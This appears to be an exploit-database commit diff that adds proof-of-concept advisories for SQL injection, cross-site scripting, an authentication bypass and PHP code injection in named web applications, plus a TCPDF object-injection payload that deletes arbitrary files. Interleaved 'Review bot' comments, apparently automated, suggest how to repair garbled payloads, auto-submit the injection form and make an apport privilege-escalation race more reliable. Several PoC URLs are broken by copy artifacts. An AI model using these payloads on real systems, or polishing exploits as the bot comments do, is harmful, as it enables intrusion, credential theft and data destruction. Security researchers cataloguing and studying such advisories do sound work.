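Review bot: the delay loop in `checker()`, `for(x = 0; x < 100000; x++);`, has no side effects and is removed by the compiler at -O2, which defeats the 'need to wait a bit for the signals to be handled' step and makes the SIGCONT/SIGSTOP pseudo-singlestepping race far less reliable; make `x` volatile or use `nanosleep`. The build line in the header (`gcc apport-race.c -o apport-race`) is unoptimised, which is why the transcript works, and that dependency should be stated. In `main()` the loop `stat("/etc/sudoers.d/core", &s); if(s.st_size == 37) break;` reads `st_size` without checking stat()'s return value, so `s` may be uninitialised until the file exists; test the return value first. The `apport_pid = pid + 1` guess is acknowledged in a comment but could be confirmed by reading `/proc/<pid>/comm` before the SIGSTOP, and the magic numbers in `kill(pid, 11)` and `kill(pid, 9)` read better as SIGSEGV and SIGKILL.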
9
platforms/php/webapps/37136.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/53398/info
|
||||
|
||||
Trombinoscope is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
Trombinoscope 3.5 and prior versions are vulnerable.
|
||||
|
||||
http://www.example.com/[script]/photo.php?id=-9999/**/union/**/select/**/1,2,version()--
|
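Review bot: the PoC path `http://www.example.com/[script]/photo.php?id=-9999/**/union/**/select/**/1,2,version()--` uses an unexplained `[script]` placeholder; say that it stands for the application's install directory. The text says 'Trombinoscope 3.5 and prior versions are vulnerable' while the files.csv row added in this commit says 3.x; the two should agree. The three-column UNION is presented without saying how the column count was established, which is the first thing anyone reproducing it will need.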
12
platforms/php/webapps/37137.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
source: http://www.securityfocus.com/bid/53409/info
|
||||
|
||||
Multiple Schneider Electric Telecontrol products are prone to an HTML-injection vulnerability because they fail to sufficiently sanitize user-supplied data before it is used in dynamic content.
|
||||
|
||||
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible.
|
||||
|
||||
The following products are affected:
|
||||
|
||||
Schneider Electric Telecontrol Kerweb versions prior to 3.0.1
|
||||
Schneider Electric Telecontrol Kerwin versions prior to 6.0.1
|
||||
|
||||
http://www.example.com/kw.dll?page=evts.xml&sessionid=xxx&nomenu=&typeevtwin=alms&dt=>variablevalue=<variablevalue=&variablevalue=&nevariablevalue=&evtclass=&evtdevicezone=&evtdevicecountry=&evtdeviceregion=&evtstatustype=&evtseveritytype=&evtstatus=&evtseverity=&evtlevel=>dateapp=<dateapp=>daterec=<daterec=&evtvariablename=[XSS]
|
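Review bot: the PoC URL contains the sequences `dt=>variablevalue=<variablevalue=` and `>dateapp=<dateapp=>daterec=<daterec=`, which are not valid query-string syntax; they look like parameter names beginning with `&gt`/`&lt` (for example `&gtvariablevalue=`) that were HTML-entity-decoded when the advisory was copied from the BID page. Re-export the original URL so the request can actually be replayed, and state which parameter the `[XSS]` marker belongs to if more than one is reflected.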
7
platforms/php/webapps/37138.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/53411/info
|
||||
|
||||
Ramui Forum Script is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
http://www.example.com//gb/user/index.php?query=%22%20onmouseover%3dprompt%28991522%29%20bad%3d%22
|
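Review bot: the PoC URL has a doubled slash (`http://www.example.com//gb/user/index.php?...`), which looks like a copy error for `/gb/user/index.php`. The payload `%22%20onmouseover%3dprompt%28991522%29%20bad%3d%22` decodes to `" onmouseover=prompt(991522) bad="`, i.e. `query` is reflected inside an attribute value and the script fires only on mouse-over; the description should say it is an attribute-context injection rather than a bare script tag, since that determines which filters it gets past.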
9
platforms/php/webapps/37139.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/53413/info
|
||||
|
||||
JibberBook is prone to a security-bypass vulnerability that may allow attackers to perform actions without proper authorization.
|
||||
|
||||
Attackers can exploit this issue to bypass authentication to gain administrative privileges ; this may aid in launching further attacks.
|
||||
|
||||
JibberBook 2.3 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/Admin/Login_form.php?loggedin=true
|
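Review bot: the PoC `http://www.example.com/Admin/Login_form.php?loggedin=true` gives no expected result, so a reader cannot distinguish a successful bypass from the login page simply reloading; state what the response shows (for example the admin panel rendered) and whether the `loggedin` flag is honoured by the other Admin/ pages or only by Login_form.php.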
15
platforms/php/webapps/37140.html
Executable file
|
@ -0,0 +1,15 @@
|
|||
source: http://www.securityfocus.com/bid/53426/info
|
||||
|
||||
PHP Enter is prone to a remote PHP code-injection vulnerability.
|
||||
|
||||
An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
|
||||
|
||||
PHP Enter 4.1.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
<form method="post" action="http://www.example.com/admin/banners.php">
|
||||
<center>
|
||||
<font color=#3A586A>Code</font><br />
|
||||
<textarea name="code"></textarea>
|
||||
<br /><br />
|
||||
<input type="submit" name="submit" VALUE=" Submit"><br /><br /><br /><br/>
|
||||
</form>
|
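Review bot: the form posts a `code` field to `http://www.example.com/admin/banners.php` but never shows a payload or says where the value ends up, so the 'remote PHP code-injection' claim is not demonstrated; include an example value (a `<?php ... ?>` snippet) and say which file it is written to or evaluated from. The action path is under `/admin/`, which implies an authenticated administrator; state whether the injection is reachable without authentication or whether this is really a CSRF-to-code-execution chain that needs a logged-in admin to submit the form. The `<center>`/`<font>` markup is harmless but a `<script>` that auto-submits would make the PoC usable as written.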
9
platforms/php/webapps/37142.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/53433/info
|
||||
|
||||
OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities.
|
||||
|
||||
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
OrangeHRM 2.7 RC is vulnerable; prior versions may also be affected.
|
||||
|
||||
http://www.example.com/plugins/ajaxCalls/haltResumeHsp.php?newHspStatus=1&empId=2&hspSummaryId=%27%20 OR%20%28select%20IF%28%28select%20mid%28version%28%29,1,1%29%29=5,%28select%20BENCHMARK%281000000,EN CODE%28%22hello%22,%22goodbye%22%29%29%29,%272%27%29%29%20--%202
|
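Review bot: the PoC URL contains stray spaces (`hspSummaryId=%27%20 OR%20...` and `EN CODE%28`) that break the payload; they look like line-wrap artifacts from the BID copy and should be removed so the request is a single URL. The injection is a time-based blind test (`BENCHMARK(1000000, ENCODE(...))` gated on `mid(version(),1,1)=5`), which the prose does not mention; saying that the observable is response delay rather than output would help anyone reproducing it.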
9
platforms/php/webapps/37143.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/53433/info
|
||||
|
||||
OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities.
|
||||
|
||||
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
OrangeHRM 2.7 RC is vulnerable; prior versions may also be affected.
|
||||
|
||||
http://www.example.com/plugins/ajaxCalls/haltResumeHsp.php?hspSummaryId=1&newHspStatus=1%3Cscript%3Ealert %28document.cookie%29;%3C/script%3E&empId=1
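Review bot: "alert %28" in the newHspStatus payload has a stray space, again apparently from line wrapping, so the injected script will not parse; restore "alert%28". The four OrangeHRM files 37142 to 37145 reuse the same description verbatim ("an SQL-injection and multiple cross-site scripting vulnerabilities") although each holds a single PoC; each file should state which issue and which parameter (here newHspStatus in plugins/ajaxCalls/haltResumeHsp.php) it covers so it is usable on its own.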
9
platforms/php/webapps/37144.txt
Executable file
@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/53433/info
OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
OrangeHRM 2.7 RC is vulnerable; prior versions may also be affected.
http://www.example.com/templates/hrfunct/emppop.php?reqcode=1&sortOrder1=%22%3E%3Cscript%3Ealert%28docume nt.cookie%29;%3C/script%3E
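Review bot: "docume nt.cookie" in the sortOrder1 payload has a stray space, so the script throws before it reads the cookie; restore "document.cookie". The leading "%22%3E" shows that sortOrder1 is reflected inside a quoted attribute, which is worth stating in the text, since the previous PoC (37143) needs no attribute break-out and readers will otherwise assume the same context.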
9
platforms/php/webapps/37145.txt
Executable file
@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/53433/info
OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
OrangeHRM 2.7 RC is vulnerable; prior versions may also be affected.
http://www.example.com/index.php?uri=%22%3E%3C/iframe%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
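Review bot: the uri payload breaks out of an attribute and then closes an `</iframe>` before the script tag, so the value is reflected into an iframe attribute; the description should say so, because it is the only one of the four OrangeHRM PoCs with that context. The boilerplate text also announces an SQL injection that this file does not contain; trim it to the index.php?uri cross-site scripting this PoC demonstrates.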
9
platforms/php/webapps/37146.txt
Executable file
@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/53434/info
PivotX is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
PivotX 2.3.2 is vulnerable; other versions may also be affected.
http://www.example.com/pivotx/ajaxhelper.php?function=view&file=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
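Review bot: the description says PivotX "fails to sufficiently sanitize user-supplied data" without naming the input; the PoC shows it is the file parameter of pivotx/ajaxhelper.php when function=view. Name the parameter in the text, and state whether ajaxhelper.php is reachable without a PivotX login, since the claimed impact ("steal cookie-based authentication credentials") presumes a victim who is already authenticated.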
11
platforms/php/webapps/37147.txt
Executable file
@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/53448/info
Chevereto Image Upload Script is prone to a cross-site scripting vulnerability and an information-disclosure vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
An attacker may leverage the information-disclosure issue to enumerate the existence of local files. Information obtained may aid in further attacks.
Chevereto Image Upload Script 1.91 is vulnerable; other versions may also be affected.
http://www.example.com/learn/chevereto/chevereto_nb1.91/Upload/?v=../index.php%00<script>alert(1);</script>
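Review bot: the PoC URL carries the test host's own path (learn/chevereto/chevereto_nb1.91/Upload/), unlike every other file in this commit, which uses a generic example.com root; replace it with the Upload directory of a default install so the PoC is not tied to the author's setup. The v parameter combines the "%00"-terminated "../index.php" used for the file-existence check in 37148 with a raw, unencoded `<script>` tag; the text should say that this file demonstrates the cross-site scripting half of the advisory and whether the tag has to be URL-encoded in practice.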
11
platforms/php/webapps/37148.txt
Executable file
@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/53448/info
Chevereto Image Upload Script is prone to a cross-site scripting vulnerability and an information-disclosure vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
An attacker may leverage the information-disclosure issue to enumerate the existence of local files. Information obtained may aid in further attacks.
Chevereto Image Upload Script 1.91 is vulnerable; other versions may also be affected.
http://www.example.com/learn/chevereto/chevereto_nb1.91/Upload/?v=../index.php
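Review bot: this file repeats 37147's description word for word and differs only in the PoC line, yet the text never says how the existence of ../index.php is revealed (a different response, error or status for an existing file versus a missing one), so a reader cannot tell success from failure. Add that observable, and apply the same path-genericization as for 37147: the PoC should target the Upload directory of a default install, not learn/chevereto/chevereto_nb1.91/.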
84
platforms/php/webapps/37151.txt
Executable file
@ -0,0 +1,84 @@
TCPDF library Universal POI Payload to Arbitrary File Deletion
[+] Author: Filippo Roncari
[+] Target: TCPDF library
[+] Version: <= 5.9 and probably others [tested on v5.9]
[+] Vendor: http://www.tcpdf.org
[+] Accessibility: Remote
[+] Severity: High
[+] CVE: n/a
[+] Advisory URL: n/a
[+] Contacts: f.roncari@securenetwork.it / f@unsec.it
[+] Summary
TCPDF library is one of the world's most used open source PHP libraries, included in thousands of CMS and Web applications worldwide. More information at: http://en.wikipedia.org/wiki/TCPDF. A universal Object Injection payload for vulnerable PHP applications, which make use of TCPDF library, is here shared.
[+] Exploit Details
The identified payload allows to exploit any POI vulnerable web application that uses unserialize() on not sanitized user input in a point from which the Tcpdf class is loadable. The payload abuses the __destruct() magic method of the Tcpdf class defined in tcpdf.php and allows to arbitrary delete files on the filesystem.
[+] Technical Details
Tcpdf.php contains the Tcpdf class definition. The __destruct() method, at least up to version 5.9 (and possibly others), is implemented as follows.
[!] Method __destruct() in tcpdf.php
-------------------------
public function __destruct() {
// restore internal encoding
if (isset($this->internal_encoding) AND !empty($this->internal_encoding)) {
mb_internal_encoding($this->internal_encoding);
}
// unset all class variables
$this->_destroy(true);
}
-------------------------
As you can see, the main action performed by __destruct() is the invocation of the inner _destroy() method, which, along with other things, calls the unlink() function on the internal object buffer.
[!] Method _destroy() in tcpdf.php
-------------------------
public function _destroy($destroyall=false, $preserve_objcopy=false) {
if ($destroyall AND isset($this->diskcache) AND $this->diskcache AND (!$preserve_objcopy) AND (!$this->empty_string($this->buffer))) {
unlink($this->buffer);
}
[...]
}
-------------------------
For a better understanding of the payload, you should know that $buffer is defined as a protected property of the Tcpdf object, which means significant differences in serialization compared to normal properties.
[!] $buffer in tcpdf.php
-------------------------
/**
* @var buffer holding in-memory PDF
* @access protected
*/
protected $buffer;
-------------------------
[+] Proof of Concept (PoC)
In view of the above, the payload consists of a serialized Tcpdf object with two protected properties set: buffer and diskcache. The first will contain the path to the arbitrary file to delete, while diskcache is a boolean property set to true, necessary to enter the _destroy() inner if branch, in order to reach the unlink() call. A particular attention must be addressed to the null-bytes surrounding the asterisks before the property names. This is the way (crazy, I know) in which PHP serializes protected object properties. An incorrect conversion of the null-bytes during payload injection will result in the exploit failure.
[!] Payload
-------------------------
O:5:"TCPDF":2:{s:9:"%00*%00buffer";s:[PATH_LENGTH]:"[FILE_PATH_TO_DELETE]";s:12:"%00*%00diskcache";b:1;}
-------------------------
[!] Generic PoC Exploit
-------------------------
http://vulnerablesite.com/vulnerable_page.php?vulnearble_par=O:5:"TCPDF":2:{s:9:"%00*%00buffer";s:26:"/var/www/arbitraryfile.ext";s:12:"%00*%00diskcache";b:1;}
-------------------------
[+] Disclaimer
Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
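Review bot: "vulnearble_par" in the Generic PoC Exploit URL is a typo for "vulnerable_par", and "POI" in the title is never expanded; spell out "PHP Object Injection" at first use, since the summary only says "Object Injection". The payload serializes the class as "TCPDF" while the technical details call it the "Tcpdf class"; PHP resolves class names case-insensitively, so the payload still works, but pick one spelling. The serialized lengths check out against the quoted code (the protected property names "\0*\0buffer" and "\0*\0diskcache" are 9 and 12 bytes with their null bytes, and /var/www/arbitraryfile.ext is 26). One caveat the Exploit Details should carry: per the quoted _destroy(), unlink() is reached only when $destroyall is true, diskcache is set and truthy, and empty_string($buffer) is false, so both properties must survive deserialization as protected members, which is exactly why the null-byte warning in the PoC section matters. Finally, "Version: <= 5.9 and probably others [tested on v5.9]" should name the exact 5.9.x release tested, since 5.9 spans many point releases.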